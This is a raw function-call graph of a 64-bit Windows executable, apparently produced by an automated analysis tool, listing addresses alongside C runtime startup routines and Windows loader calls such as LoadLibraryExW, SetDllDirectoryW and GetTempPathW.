                                                                                                                                                                                                                                execution_graph 19011 7ff64488afd0 19012 7ff64488afd5 19011->19012 19016 7ff64488afea 19011->19016 19017 7ff64488aff0 19012->19017 19018 7ff64488b03a 19017->19018 19019 7ff64488b032 19017->19019 19021 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19018->19021 19020 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19019->19020 19020->19018 19022 7ff64488b047 19021->19022 19023 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19022->19023 19024 7ff64488b054 19023->19024 19025 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19024->19025 19026 7ff64488b061 19025->19026 19027 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19026->19027 19028 7ff64488b06e 19027->19028 19029 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19028->19029 19030 7ff64488b07b 19029->19030 19031 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19030->19031 19032 7ff64488b088 19031->19032 19033 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19032->19033 19034 7ff64488b095 19033->19034 19035 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19034->19035 19036 7ff64488b0a5 19035->19036 19037 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19036->19037 19038 7ff64488b0b5 19037->19038 19043 7ff64488ae94 19038->19043 19057 7ff6448902d8 EnterCriticalSection 19043->19057 19436 7ff644889d50 19439 7ff644889ccc 19436->19439 19446 7ff6448902d8 EnterCriticalSection 19439->19446 19447 7ff64487cb50 19448 7ff64487cb60 19447->19448 19464 7ff644889ba8 19448->19464 19450 7ff64487cb6c 19470 7ff64487ce48 19450->19470 19452 7ff64487d12c 7 API calls 19455 7ff64487cc05 19452->19455 19453 7ff64487cb84 _RTC_Initialize 19462 7ff64487cbd9 19453->19462 19475 7ff64487cff8 19453->19475 19456 7ff64487cb99 19478 7ff644889014 19456->19478 19462->19452 19463 7ff64487cbf5 19462->19463 19465 7ff644889bb9 19464->19465 19466 7ff644889bc1 19465->19466 19467 7ff644884f08 _get_daylight 11 API calls 19465->19467 19466->19450 19468 7ff644889bd0 19467->19468 19469 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19468->19469 19469->19466 19471 7ff64487ce59 19470->19471 19474 7ff64487ce5e __scrt_acquire_startup_lock 19470->19474 19472 7ff64487d12c 7 API calls 19471->19472 19471->19474 19473 7ff64487ced2 19472->19473 19474->19453 19503 7ff64487cfbc 19475->19503 19477 7ff64487d001 19477->19456 19479 7ff644889034 19478->19479 19486 7ff64487cba5 19478->19486 19480 7ff644889052 GetModuleFileNameW 19479->19480 19481 7ff64488903c 19479->19481 19484 7ff64488907d 19480->19484 19482 7ff644884f08 _get_daylight 11 API calls 19481->19482 19483 7ff644889041 19482->19483 19485 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19483->19485 19518 7ff644888fb4 19484->19518 19485->19486 19486->19462 19502 7ff64487d0cc InitializeSListHead 19486->19502 19489 7ff6448890c5 19490 7ff644884f08 _get_daylight 11 API calls 19489->19490 19491 7ff6448890ca 19490->19491 19494 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19491->19494 19492 7ff6448890ff 19495 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19492->19495 19493 7ff6448890dd 19493->19492 19496 7ff644889144 19493->19496 19497 7ff64488912b 19493->19497 19494->19486 19495->19486 19500 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19496->19500 19498 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19497->19498 19499 7ff644889134 19498->19499 19501 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19499->19501 19500->19492 19501->19486 19504 7ff64487cfd6 19503->19504 19506 7ff64487cfcf 19503->19506 19507 7ff64488a1ec 19504->19507 19506->19477 19510 7ff644889e28 19507->19510 19517 7ff6448902d8 EnterCriticalSection 19510->19517 19519 7ff644888fcc 19518->19519 19523 7ff644889004 19518->19523 19520 7ff64488eb98 _get_daylight 11 API calls 19519->19520 19519->19523 19521 7ff644888ffa 19520->19521 19522 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19521->19522 19522->19523 19523->19489 19523->19493 16036 7ff64487cc3c 16057 7ff64487ce0c 16036->16057 16039 7ff64487cd88 16211 7ff64487d12c IsProcessorFeaturePresent 16039->16211 16040 7ff64487cc58 __scrt_acquire_startup_lock 16042 7ff64487cd92 16040->16042 16049 7ff64487cc76 __scrt_release_startup_lock 16040->16049 16043 7ff64487d12c 7 API calls 16042->16043 16045 7ff64487cd9d __CxxCallCatchBlock 16043->16045 16044 7ff64487cc9b 16046 7ff64487cd21 16063 7ff64487d274 16046->16063 16048 7ff64487cd26 16066 7ff644871000 16048->16066 16049->16044 16049->16046 16200 7ff644889b2c 16049->16200 16054 7ff64487cd49 16054->16045 16207 7ff64487cf90 16054->16207 16058 7ff64487ce14 16057->16058 16059 7ff64487ce20 __scrt_dllmain_crt_thread_attach 16058->16059 16060 7ff64487cc50 16059->16060 16061 7ff64487ce2d 16059->16061 16060->16039 16060->16040 16061->16060 16218 7ff64487d888 16061->16218 16245 7ff64489a4d0 16063->16245 16067 7ff644871009 16066->16067 16247 7ff644885484 16067->16247 16069 7ff6448737fb 16254 7ff6448736b0 16069->16254 16076 7ff64487383c 16414 7ff644871c80 16076->16414 16077 7ff64487391b 16423 7ff6448745c0 16077->16423 16080 7ff64487385b 16326 7ff644878830 16080->16326 16083 7ff64487396a 16446 7ff644872710 16083->16446 16084 7ff64487388e 16094 7ff6448738bb __vcrt_freefls 16084->16094 16418 7ff6448789a0 16084->16418 16087 7ff64487395d 16088 7ff644873984 16087->16088 16089 7ff644873962 16087->16089 16090 7ff644871c80 49 API calls 16088->16090 16442 7ff64488004c 16089->16442 16093 7ff6448739a3 16090->16093 16099 7ff644871950 115 API calls 16093->16099 16095 7ff644878830 14 API calls 16094->16095 16102 7ff6448738de __vcrt_freefls 16094->16102 16095->16102 16097 7ff644873a0b 16098 7ff6448789a0 40 API calls 16097->16098 16100 7ff644873a17 16098->16100 16101 7ff6448739ce 16099->16101 16103 7ff6448789a0 40 API calls 16100->16103 16101->16080 16104 7ff6448739de 16101->16104 16108 7ff64487390e __vcrt_freefls 16102->16108 16457 7ff644878940 16102->16457 16105 7ff644873a23 16103->16105 16106 7ff644872710 54 API calls 16104->16106 16107 7ff6448789a0 40 API calls 16105->16107 16114 7ff644873808 __vcrt_freefls 16106->16114 16107->16108 16109 7ff644878830 14 API calls 16108->16109 16110 7ff644873a3b 16109->16110 16111 7ff644873b2f 16110->16111 16112 7ff644873a60 __vcrt_freefls 16110->16112 16113 7ff644872710 54 API calls 16111->16113 16115 7ff644878940 40 API calls 16112->16115 16124 7ff644873aab 16112->16124 16113->16114 16464 7ff64487c550 16114->16464 16115->16124 16116 7ff644878830 14 API calls 16117 7ff644873bf4 __vcrt_freefls 16116->16117 16118 7ff644873c46 16117->16118 16119 7ff644873d41 16117->16119 16120 7ff644873cd4 16118->16120 16121 7ff644873c50 16118->16121 16473 7ff6448744e0 16119->16473 16126 7ff644878830 14 API calls 16120->16126 16339 7ff6448790e0 16121->16339 16123 7ff644873d4f 16128 7ff644873d65 16123->16128 16129 7ff644873d71 16123->16129 16124->16116 16127 7ff644873ce0 16126->16127 16131 7ff644873c61 16127->16131 16134 7ff644873ced 16127->16134 16476 7ff644874630 16128->16476 16133 7ff644871c80 49 API calls 16129->16133 16136 7ff644872710 54 API calls 16131->16136 16142 7ff644873cc8 __vcrt_freefls 16133->16142 16137 7ff644871c80 49 API calls 16134->16137 16136->16114 16140 7ff644873d0b 16137->16140 16138 7ff644873dbc 16389 7ff644879390 16138->16389 16140->16142 16143 7ff644873d12 16140->16143 16142->16138 16144 7ff644873da7 LoadLibraryExW 16142->16144 16146 7ff644872710 54 API calls 16143->16146 16144->16138 16145 7ff644873dcf SetDllDirectoryW 16148 7ff644873e02 16145->16148 16189 7ff644873e52 16145->16189 16146->16114 16149 7ff644878830 14 API calls 16148->16149 16157 7ff644873e0e __vcrt_freefls 16149->16157 16150 7ff644874000 16152 7ff64487402d 16150->16152 16153 7ff64487400a PostMessageW GetMessageW 16150->16153 16151 7ff644873f13 16394 7ff6448733c0 16151->16394 16553 7ff644873360 16152->16553 16153->16152 16160 7ff644873eea 16157->16160 16164 7ff644873e46 16157->16164 16163 7ff644878940 40 API calls 16160->16163 16163->16189 16164->16189 16479 7ff644876dc0 16164->16479 16169 7ff644876fc0 FreeLibrary 16171 7ff644874053 16169->16171 16177 7ff644873e79 16180 7ff644873e9a 16177->16180 16191 7ff644873e7d 16177->16191 16500 7ff644876e00 16177->16500 16180->16191 16519 7ff6448771b0 16180->16519 16189->16150 16189->16151 16191->16189 16535 7ff644872a50 16191->16535 16201 7ff644889b43 16200->16201 16202 7ff644889b64 16200->16202 16201->16046 18791 7ff64488a3d8 16202->18791 16205 7ff64487d2b8 GetModuleHandleW 16206 7ff64487d2c9 16205->16206 16206->16054 16208 7ff64487cfa1 16207->16208 16209 7ff64487cd60 16208->16209 16210 7ff64487d888 7 API calls 16208->16210 16209->16044 16210->16209 16212 7ff64487d152 _isindst __scrt_get_show_window_mode 16211->16212 16213 7ff64487d171 RtlCaptureContext RtlLookupFunctionEntry 16212->16213 16214 7ff64487d19a RtlVirtualUnwind 16213->16214 16215 7ff64487d1d6 __scrt_get_show_window_mode 16213->16215 16214->16215 16216 7ff64487d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16215->16216 16217 7ff64487d256 _isindst 16216->16217 16217->16042 16219 7ff64487d89a 16218->16219 16220 7ff64487d890 16218->16220 16219->16060 16224 7ff64487dc24 16220->16224 16225 7ff64487dc33 16224->16225 16226 7ff64487d895 16224->16226 16232 7ff64487de60 16225->16232 16228 7ff64487dc90 16226->16228 16229 7ff64487dcbb 16228->16229 16230 7ff64487dcbf 16229->16230 16231 7ff64487dc9e DeleteCriticalSection 16229->16231 16230->16219 16231->16229 16236 7ff64487dcc8 16232->16236 16237 7ff64487ddb2 TlsFree 16236->16237 16239 7ff64487dd0c __vcrt_FlsAlloc 16236->16239 16238 7ff64487dd3a LoadLibraryExW 16241 7ff64487dd5b GetLastError 16238->16241 16242 7ff64487ddd9 16238->16242 16239->16237 16239->16238 16240 7ff64487ddf9 GetProcAddress 16239->16240 16244 7ff64487dd7d LoadLibraryExW 16239->16244 16240->16237 16241->16239 16242->16240 16243 7ff64487ddf0 FreeLibrary 16242->16243 16243->16240 16244->16239 16244->16242 16246 7ff64487d28b GetStartupInfoW 16245->16246 16246->16048 16250 7ff64488f480 16247->16250 16248 7ff64488f4d3 16566 7ff64488a814 16248->16566 16250->16248 16251 7ff64488f526 16250->16251 16576 7ff64488f358 16251->16576 16253 7ff64488f4fc 16253->16069 16683 7ff64487c850 16254->16683 16257 7ff6448736eb GetLastError 16690 7ff644872c50 16257->16690 16258 7ff644873710 16685 7ff644879280 FindFirstFileExW 16258->16685 16261 7ff644873706 16265 7ff64487c550 _log10_special 8 API calls 16261->16265 16263 7ff64487377d 16716 7ff644879440 16263->16716 16264 7ff644873723 16705 7ff644879300 CreateFileW 16264->16705 16269 7ff6448737b5 16265->16269 16268 7ff64487378b 16268->16261 16273 7ff644872810 49 API calls 16268->16273 16269->16114 16276 7ff644871950 16269->16276 16271 7ff64487374c __vcrt_FlsAlloc 16271->16263 16272 7ff644873734 16708 7ff644872810 16272->16708 16273->16261 16277 7ff6448745c0 108 API calls 16276->16277 16278 7ff644871985 16277->16278 16279 7ff644871c43 16278->16279 16281 7ff644877f90 83 API calls 16278->16281 16280 7ff64487c550 _log10_special 8 API calls 16279->16280 16282 7ff644871c5e 16280->16282 16283 7ff6448719cb 16281->16283 16282->16076 16282->16077 16325 7ff644871a03 16283->16325 17121 7ff6448806d4 16283->17121 16285 7ff64488004c 74 API calls 16285->16279 16286 7ff6448719e5 16287 7ff644871a08 16286->16287 16288 7ff6448719e9 16286->16288 17125 7ff64488039c 16287->17125 16289 7ff644884f08 _get_daylight 11 API calls 16288->16289 16291 7ff6448719ee 16289->16291 17128 7ff644872910 16291->17128 16294 7ff644871a26 16296 7ff644884f08 _get_daylight 11 API calls 16294->16296 16295 7ff644871a45 16298 7ff644871a5c 16295->16298 16299 7ff644871a7b 16295->16299 16297 7ff644871a2b 16296->16297 16300 7ff644872910 54 API calls 16297->16300 16301 7ff644884f08 _get_daylight 11 API calls 16298->16301 16302 7ff644871c80 49 API calls 16299->16302 16300->16325 16303 7ff644871a61 16301->16303 16304 7ff644871a92 16302->16304 16305 7ff644872910 54 API calls 16303->16305 16306 7ff644871c80 49 API calls 16304->16306 16305->16325 16307 7ff644871add 16306->16307 16308 7ff6448806d4 73 API calls 16307->16308 16309 7ff644871b01 16308->16309 16310 7ff644871b16 16309->16310 16311 7ff644871b35 16309->16311 16312 7ff644884f08 _get_daylight 11 API calls 16310->16312 16313 7ff64488039c _fread_nolock 53 API calls 16311->16313 16314 7ff644871b1b 16312->16314 16315 7ff644871b4a 16313->16315 16316 7ff644872910 54 API calls 16314->16316 16317 7ff644871b50 16315->16317 16318 7ff644871b6f 16315->16318 16316->16325 16319 7ff644884f08 _get_daylight 11 API calls 16317->16319 17143 7ff644880110 16318->17143 16321 7ff644871b55 16319->16321 16323 7ff644872910 54 API calls 16321->16323 16323->16325 16324 7ff644872710 54 API calls 16324->16325 16325->16285 16327 7ff64487883a 16326->16327 16328 7ff644879390 2 API calls 16327->16328 16329 7ff644878859 GetEnvironmentVariableW 16328->16329 16330 7ff644878876 ExpandEnvironmentStringsW 16329->16330 16331 7ff6448788c2 16329->16331 16330->16331 16332 7ff644878898 16330->16332 16333 7ff64487c550 _log10_special 8 API calls 16331->16333 16334 7ff644879440 2 API calls 16332->16334 16335 7ff6448788d4 16333->16335 16336 7ff6448788aa 16334->16336 16335->16084 16337 7ff64487c550 _log10_special 8 API calls 16336->16337 16338 7ff6448788ba 16337->16338 16338->16084 16340 7ff6448790f5 16339->16340 17361 7ff644878570 GetCurrentProcess OpenProcessToken 16340->17361 16343 7ff644878570 7 API calls 16344 7ff644879121 16343->16344 16345 7ff64487913a 16344->16345 16346 7ff644879154 16344->16346 16347 7ff6448726b0 48 API calls 16345->16347 16348 7ff6448726b0 48 API calls 16346->16348 16349 7ff644879152 16347->16349 16350 7ff644879167 LocalFree LocalFree 16348->16350 16349->16350 16351 7ff644879183 16350->16351 16353 7ff64487918f 16350->16353 17371 7ff644872b50 16351->17371 16354 7ff64487c550 _log10_special 8 API calls 16353->16354 16355 7ff644873c55 16354->16355 16355->16131 16356 7ff644878660 16355->16356 16357 7ff644878678 16356->16357 16358 7ff64487869c 16357->16358 16359 7ff6448786fa GetTempPathW GetCurrentProcessId 16357->16359 16361 7ff644878830 14 API calls 16358->16361 17380 7ff6448725c0 16359->17380 16362 7ff6448786a8 16361->16362 17387 7ff6448781d0 16362->17387 16367 7ff6448786e8 __vcrt_freefls 16388 7ff6448787d4 __vcrt_freefls 16367->16388 16368 7ff644878728 __vcrt_freefls 16375 7ff644878765 __vcrt_freefls 16368->16375 17384 7ff644888b68 16368->17384 16371 7ff6448786ce __vcrt_freefls 16371->16359 16378 7ff6448786dc 16371->16378 16374 7ff64487c550 _log10_special 8 API calls 16377 7ff644873cbb 16374->16377 16380 7ff644879390 2 API calls 16375->16380 16375->16388 16377->16131 16377->16142 16379 7ff644872810 49 API calls 16378->16379 16379->16367 16381 7ff6448787b1 16380->16381 16382 7ff6448787e9 16381->16382 16383 7ff6448787b6 16381->16383 16384 7ff644888238 38 API calls 16382->16384 16385 7ff644879390 2 API calls 16383->16385 16384->16388 16386 7ff6448787c6 16385->16386 16387 7ff644888238 38 API calls 16386->16387 16387->16388 16388->16374 16390 7ff6448793b2 MultiByteToWideChar 16389->16390 16391 7ff6448793d6 16389->16391 16390->16391 16393 7ff6448793ec __vcrt_freefls 16390->16393 16392 7ff6448793f3 MultiByteToWideChar 16391->16392 16391->16393 16392->16393 16393->16145 16406 7ff6448733ce __scrt_get_show_window_mode 16394->16406 16395 7ff64487c550 _log10_special 8 API calls 16397 7ff644873664 16395->16397 16396 7ff6448735c7 16396->16395 16397->16114 16413 7ff6448790c0 LocalFree 16397->16413 16399 7ff644871c80 49 API calls 16399->16406 16400 7ff6448735e2 16402 7ff644872710 54 API calls 16400->16402 16402->16396 16405 7ff6448735c9 16407 7ff644872710 54 API calls 16405->16407 16406->16396 16406->16399 16406->16400 16406->16405 16408 7ff644872a50 54 API calls 16406->16408 16411 7ff6448735d0 16406->16411 17676 7ff644874560 16406->17676 17682 7ff644877e20 16406->17682 17694 7ff644871600 16406->17694 17742 7ff644877120 16406->17742 17746 7ff644874190 16406->17746 17790 7ff644874450 16406->17790 16407->16396 16408->16406 16412 7ff644872710 54 API calls 16411->16412 16412->16396 16415 7ff644871ca5 16414->16415 16416 7ff644884984 49 API calls 16415->16416 16417 7ff644871cc8 16416->16417 16417->16080 16419 7ff644879390 2 API calls 16418->16419 16420 7ff6448789b4 16419->16420 16421 7ff644888238 38 API calls 16420->16421 16422 7ff6448789c6 __vcrt_freefls 16421->16422 16422->16094 16424 7ff6448745cc 16423->16424 16425 7ff644879390 2 API calls 16424->16425 16426 7ff6448745f4 16425->16426 16427 7ff644879390 2 API calls 16426->16427 16428 7ff644874607 16427->16428 17973 7ff644885f94 16428->17973 16431 7ff64487c550 _log10_special 8 API calls 16432 7ff64487392b 16431->16432 16432->16083 16433 7ff644877f90 16432->16433 16434 7ff644877fb4 16433->16434 16435 7ff64487808b __vcrt_freefls 16434->16435 16436 7ff6448806d4 73 API calls 16434->16436 16435->16087 16437 7ff644877fd0 16436->16437 16437->16435 18365 7ff6448878c8 16437->18365 16439 7ff644877fe5 16439->16435 16440 7ff6448806d4 73 API calls 16439->16440 16441 7ff64488039c _fread_nolock 53 API calls 16439->16441 16440->16439 16441->16439 16443 7ff64488007c 16442->16443 18380 7ff64487fe28 16443->18380 16445 7ff644880095 16445->16083 16447 7ff64487c850 16446->16447 16448 7ff644872734 GetCurrentProcessId 16447->16448 16449 7ff644871c80 49 API calls 16448->16449 16450 7ff644872787 16449->16450 16451 7ff644884984 49 API calls 16450->16451 16452 7ff6448727cf 16451->16452 16453 7ff644872620 12 API calls 16452->16453 16454 7ff6448727f1 16453->16454 16455 7ff64487c550 _log10_special 8 API calls 16454->16455 16456 7ff644872801 16455->16456 16456->16114 16458 7ff644879390 2 API calls 16457->16458 16459 7ff64487895c 16458->16459 16460 7ff644879390 2 API calls 16459->16460 16461 7ff64487896c 16460->16461 16462 7ff644888238 38 API calls 16461->16462 16463 7ff64487897a __vcrt_freefls 16462->16463 16463->16097 16465 7ff64487c559 16464->16465 16466 7ff644873ca7 16465->16466 16467 7ff64487c8e0 IsProcessorFeaturePresent 16465->16467 16466->16205 16468 7ff64487c8f8 16467->16468 18391 7ff64487cad8 RtlCaptureContext 16468->18391 16474 7ff644871c80 49 API calls 16473->16474 16475 7ff6448744fd 16474->16475 16475->16123 16477 7ff644871c80 49 API calls 16476->16477 16478 7ff644874660 16477->16478 16478->16142 16480 7ff644876dd5 16479->16480 16481 7ff644873e64 16480->16481 16482 7ff644884f08 _get_daylight 11 API calls 16480->16482 16485 7ff644877340 16481->16485 16483 7ff644876de2 16482->16483 16484 7ff644872910 54 API calls 16483->16484 16484->16481 18396 7ff644871470 16485->18396 16487 7ff644877368 16488 7ff644874630 49 API calls 16487->16488 16493 7ff6448774b9 __vcrt_freefls 16487->16493 16489 7ff64487738a 16488->16489 16490 7ff644874630 49 API calls 16489->16490 16494 7ff64487738f 16489->16494 16492 7ff6448773ae 16490->16492 16491 7ff644872a50 54 API calls 16491->16493 16492->16494 16495 7ff644874630 49 API calls 16492->16495 16493->16177 16494->16491 16496 7ff6448773ca 16495->16496 16496->16494 16497 7ff6448773d3 16496->16497 16498 7ff644872710 54 API calls 16497->16498 16499 7ff644877443 memcpy_s __vcrt_freefls 16497->16499 16498->16493 16499->16177 16512 7ff644876e1c 16500->16512 16501 7ff64487c550 _log10_special 8 API calls 16502 7ff644876f51 16501->16502 16502->16180 16503 7ff644871840 45 API calls 16503->16512 16504 7ff644876faa 16506 7ff644872710 54 API calls 16504->16506 16505 7ff644871c80 49 API calls 16505->16512 16518 7ff644876f3f 16506->16518 16507 7ff644876f97 16509 7ff644872710 54 API calls 16507->16509 16508 7ff644874560 10 API calls 16508->16512 16509->16518 16510 7ff644877e20 52 API calls 16510->16512 16511 7ff644872a50 54 API calls 16511->16512 16512->16503 16512->16504 16512->16505 16512->16507 16512->16508 16512->16510 16512->16511 16513 7ff644876f84 16512->16513 16515 7ff644871600 118 API calls 16512->16515 16516 7ff644876f6d 16512->16516 16512->16518 16514 7ff644872710 54 API calls 16513->16514 16514->16518 16515->16512 16517 7ff644872710 54 API calls 16516->16517 16517->16518 16518->16501 18426 7ff644878e80 16519->18426 16521 7ff6448771c9 16522 7ff644878e80 3 API calls 16521->16522 16523 7ff6448771dc 16522->16523 16524 7ff64487720f 16523->16524 16525 7ff6448771f4 16523->16525 16536 7ff64487c850 16535->16536 16537 7ff644872a74 GetCurrentProcessId 16536->16537 16538 7ff644871c80 49 API calls 16537->16538 16539 7ff644872ac7 16538->16539 16540 7ff644884984 49 API calls 16539->16540 16541 7ff644872b0f 16540->16541 16542 7ff644872620 12 API calls 16541->16542 16543 7ff644872b31 16542->16543 18502 7ff644876360 16553->18502 16557 7ff644873381 16561 7ff644873399 16557->16561 18570 7ff644876050 16557->18570 16559 7ff64487338d 16559->16561 16562 7ff644873670 16561->16562 16563 7ff64487367e 16562->16563 16564 7ff64487368f 16563->16564 18790 7ff644878e60 FreeLibrary 16563->18790 16564->16169 16583 7ff64488a55c 16566->16583 16569 7ff64488a84f 16569->16253 16682 7ff64488546c EnterCriticalSection 16576->16682 16584 7ff64488a5b3 16583->16584 16585 7ff64488a578 GetLastError 16583->16585 16584->16569 16589 7ff64488a5c8 16584->16589 16586 7ff64488a588 16585->16586 16596 7ff64488b390 16586->16596 16590 7ff64488a5e4 GetLastError SetLastError 16589->16590 16591 7ff64488a5fc 16589->16591 16590->16591 16591->16569 16592 7ff64488a900 IsProcessorFeaturePresent 16591->16592 16593 7ff64488a913 16592->16593 16674 7ff64488a614 16593->16674 16597 7ff64488b3af FlsGetValue 16596->16597 16598 7ff64488b3ca FlsSetValue 16596->16598 16599 7ff64488b3c4 16597->16599 16600 7ff64488a5a3 SetLastError 16597->16600 16598->16600 16601 7ff64488b3d7 16598->16601 16599->16598 16600->16584 16613 7ff64488eb98 16601->16613 16604 7ff64488b404 FlsSetValue 16606 7ff64488b410 FlsSetValue 16604->16606 16607 7ff64488b422 16604->16607 16605 7ff64488b3f4 FlsSetValue 16608 7ff64488b3fd 16605->16608 16606->16608 16626 7ff64488aef4 16607->16626 16620 7ff64488a948 16608->16620 16614 7ff64488eba9 _get_daylight 16613->16614 16615 7ff64488ebfa 16614->16615 16616 7ff64488ebde HeapAlloc 16614->16616 16631 7ff644893590 16614->16631 16634 7ff644884f08 16615->16634 16616->16614 16617 7ff64488b3e6 16616->16617 16617->16604 16617->16605 16621 7ff64488a94d RtlFreeHeap 16620->16621 16625 7ff64488a97c 16620->16625 16622 7ff64488a968 GetLastError 16621->16622 16621->16625 16623 7ff64488a975 Concurrency::details::SchedulerProxy::DeleteThis 16622->16623 16624 7ff644884f08 _get_daylight 9 API calls 16623->16624 16624->16625 16625->16600 16660 7ff64488adcc 16626->16660 16637 7ff6448935d0 16631->16637 16643 7ff64488b2c8 GetLastError 16634->16643 16636 7ff644884f11 16636->16617 16642 7ff6448902d8 EnterCriticalSection 16637->16642 16644 7ff64488b309 FlsSetValue 16643->16644 16648 7ff64488b2ec 16643->16648 16645 7ff64488b2f9 16644->16645 16646 7ff64488b31b 16644->16646 16649 7ff64488b375 SetLastError 16645->16649 16647 7ff64488eb98 _get_daylight 5 API calls 16646->16647 16650 7ff64488b32a 16647->16650 16648->16644 16648->16645 16649->16636 16651 7ff64488b348 FlsSetValue 16650->16651 16652 7ff64488b338 FlsSetValue 16650->16652 16654 7ff64488b354 FlsSetValue 16651->16654 16655 7ff64488b366 16651->16655 16653 7ff64488b341 16652->16653 16656 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16653->16656 16654->16653 16657 7ff64488aef4 _get_daylight 5 API calls 16655->16657 16656->16645 16658 7ff64488b36e 16657->16658 16659 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16658->16659 16659->16649 16672 7ff6448902d8 EnterCriticalSection 16660->16672 16675 7ff64488a64e _isindst __scrt_get_show_window_mode 16674->16675 16676 7ff64488a676 RtlCaptureContext RtlLookupFunctionEntry 16675->16676 16677 7ff64488a6b0 RtlVirtualUnwind 16676->16677 16678 7ff64488a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16676->16678 16677->16678 16679 7ff64488a738 _isindst 16678->16679 16680 7ff64487c550 _log10_special 8 API calls 16679->16680 16681 7ff64488a757 GetCurrentProcess TerminateProcess 16680->16681 16684 7ff6448736bc GetModuleFileNameW 16683->16684 16684->16257 16684->16258 16686 7ff6448792d2 16685->16686 16687 7ff6448792bf FindClose 16685->16687 16688 7ff64487c550 _log10_special 8 API calls 16686->16688 16687->16686 16689 7ff64487371a 16688->16689 16689->16263 16689->16264 16691 7ff64487c850 16690->16691 16692 7ff644872c70 GetCurrentProcessId 16691->16692 16721 7ff6448726b0 16692->16721 16694 7ff644872cb9 16725 7ff644884bd8 16694->16725 16697 7ff6448726b0 48 API calls 16698 7ff644872d34 FormatMessageW 16697->16698 16700 7ff644872d6d 16698->16700 16701 7ff644872d7f MessageBoxW 16698->16701 16702 7ff6448726b0 48 API calls 16700->16702 16703 7ff64487c550 _log10_special 8 API calls 16701->16703 16702->16701 16704 7ff644872daf 16703->16704 16704->16261 16706 7ff644873730 16705->16706 16707 7ff644879340 GetFinalPathNameByHandleW CloseHandle 16705->16707 16706->16271 16706->16272 16707->16706 16709 7ff644872834 16708->16709 16710 7ff6448726b0 48 API calls 16709->16710 16711 7ff644872887 16710->16711 16712 7ff644884bd8 48 API calls 16711->16712 16713 7ff6448728d0 MessageBoxW 16712->16713 16714 7ff64487c550 _log10_special 8 API calls 16713->16714 16715 7ff644872900 16714->16715 16715->16261 16717 7ff64487946a WideCharToMultiByte 16716->16717 16718 7ff644879495 16716->16718 16717->16718 16720 7ff6448794ab __vcrt_freefls 16717->16720 16719 7ff6448794b2 WideCharToMultiByte 16718->16719 16718->16720 16719->16720 16720->16268 16722 7ff6448726d5 16721->16722 16723 7ff644884bd8 48 API calls 16722->16723 16724 7ff6448726f8 16723->16724 16724->16694 16729 7ff644884c32 16725->16729 16726 7ff644884c57 16727 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16726->16727 16742 7ff644884c81 16727->16742 16728 7ff644884c93 16743 7ff644882f90 16728->16743 16729->16726 16729->16728 16732 7ff644884d74 16734 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16732->16734 16733 7ff64487c550 _log10_special 8 API calls 16735 7ff644872d04 16733->16735 16734->16742 16735->16697 16736 7ff644884d9a 16736->16732 16738 7ff644884da4 16736->16738 16737 7ff644884d49 16739 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16737->16739 16741 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16738->16741 16739->16742 16740 7ff644884d40 16740->16732 16740->16737 16741->16742 16742->16733 16744 7ff644882fce 16743->16744 16745 7ff644882fbe 16743->16745 16746 7ff644882fd7 16744->16746 16751 7ff644883005 16744->16751 16749 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16745->16749 16747 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16746->16747 16748 7ff644882ffd 16747->16748 16748->16732 16748->16736 16748->16737 16748->16740 16749->16748 16751->16745 16751->16748 16754 7ff6448839a4 16751->16754 16787 7ff6448833f0 16751->16787 16824 7ff644882b80 16751->16824 16755 7ff644883a57 16754->16755 16756 7ff6448839e6 16754->16756 16759 7ff644883a5c 16755->16759 16760 7ff644883ab0 16755->16760 16757 7ff6448839ec 16756->16757 16758 7ff644883a81 16756->16758 16761 7ff6448839f1 16757->16761 16762 7ff644883a20 16757->16762 16847 7ff644881d54 16758->16847 16763 7ff644883a91 16759->16763 16764 7ff644883a5e 16759->16764 16766 7ff644883ac7 16760->16766 16768 7ff644883aba 16760->16768 16769 7ff644883abf 16760->16769 16761->16766 16767 7ff6448839f7 16761->16767 16762->16767 16762->16769 16854 7ff644881944 16763->16854 16775 7ff644883a00 16764->16775 16776 7ff644883a6d 16764->16776 16861 7ff6448846ac 16766->16861 16774 7ff644883a32 16767->16774 16767->16775 16782 7ff644883a1b 16767->16782 16768->16758 16768->16769 16785 7ff644883af0 16769->16785 16865 7ff644882164 16769->16865 16774->16785 16837 7ff644884494 16774->16837 16775->16785 16827 7ff644884158 16775->16827 16776->16758 16777 7ff644883a72 16776->16777 16777->16785 16843 7ff644884558 16777->16843 16779 7ff64487c550 _log10_special 8 API calls 16781 7ff644883dea 16779->16781 16781->16751 16782->16785 16786 7ff644883cdc 16782->16786 16872 7ff6448847c0 16782->16872 16785->16779 16786->16785 16878 7ff64488ea08 16786->16878 16788 7ff644883414 16787->16788 16789 7ff6448833fe 16787->16789 16792 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16788->16792 